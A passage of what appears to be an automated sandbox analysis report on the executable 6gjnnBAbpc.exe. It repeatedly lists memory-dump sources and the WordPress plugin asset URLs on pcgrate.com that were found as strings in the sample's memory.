6gjnnBAbpc.exe, 00000000.00000003.433068945.00000000076D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.314408979.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.434994131.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.432769760.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/elementor/assets/lib/eicons/fonts/eicons.ttf?5.10.0)
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.318995335.00000000051B0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.321407915.00000000069C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.433068945.00000000076D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.314408979.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.434994131.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.432769760.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/elementor/assets/lib/eicons/fonts/eicons.woff2?5.10.0)
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.318995335.00000000051B0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.321407915.00000000069C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.433068945.00000000076D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.314408979.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.434994131.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.432769760.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/elementor/assets/lib/eicons/fonts/eicons.woff?5.10.0)
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.318995335.00000000051B0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.321407915.00000000069C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.433068945.00000000076D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.314408979.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.434994131.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.432769760.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/elementor/assets/lib/font-awesome/css/brands.min.css?ver=5
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.318995335.00000000051B0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.321407915.00000000069C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.433068945.00000000076D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.314408979.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.434994131.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.432769760.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/elementor/assets/lib/font-awesome/css/fontawesome.min.css?
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.318995335.00000000051B0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.321407915.00000000069C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.433068945.00000000076D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.314408979.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.434994131.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.432769760.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/elementor/assets/lib/share-link/share-link.min.js?ver=3.3.
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.318995335.00000000051B0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.321407915.00000000069C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.433068945.00000000076D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.314408979.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.434994131.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.432769760.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/elementor/assets/lib/swiper/swiper.min.js?ver=5.3.6
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.318995335.00000000051B0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.321407915.00000000069C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.433068945.00000000076D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.314408979.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.434994131.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.432769760.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/elementor/assets/lib/waypoints/waypoints.min.js?ver=4.0.2
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.318995335.00000000051B0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.321407915.00000000069C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.433068945.00000000076D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.314408979.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.434994131.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.432769760.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/email-subscribers/lite/public/css/email-subscribers-public
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.318995335.00000000051B0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.321407915.00000000069C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.433068945.00000000076D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.314408979.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.434994131.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.432769760.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/email-subscribers/lite/public/js/email-subscribers-public.
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.318995335.00000000051B0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.321407915.00000000069C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.433068945.00000000076D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.314408979.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.434994131.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.432769760.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/feedback-modal-for-website/assets/css/fm-public.css?ver=1.
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.318995335.00000000051B0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.321407915.00000000069C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.433068945.00000000076D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.314408979.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.434994131.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.432769760.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/feedback-modal-for-website/assets/icons/line-awesome/css/l
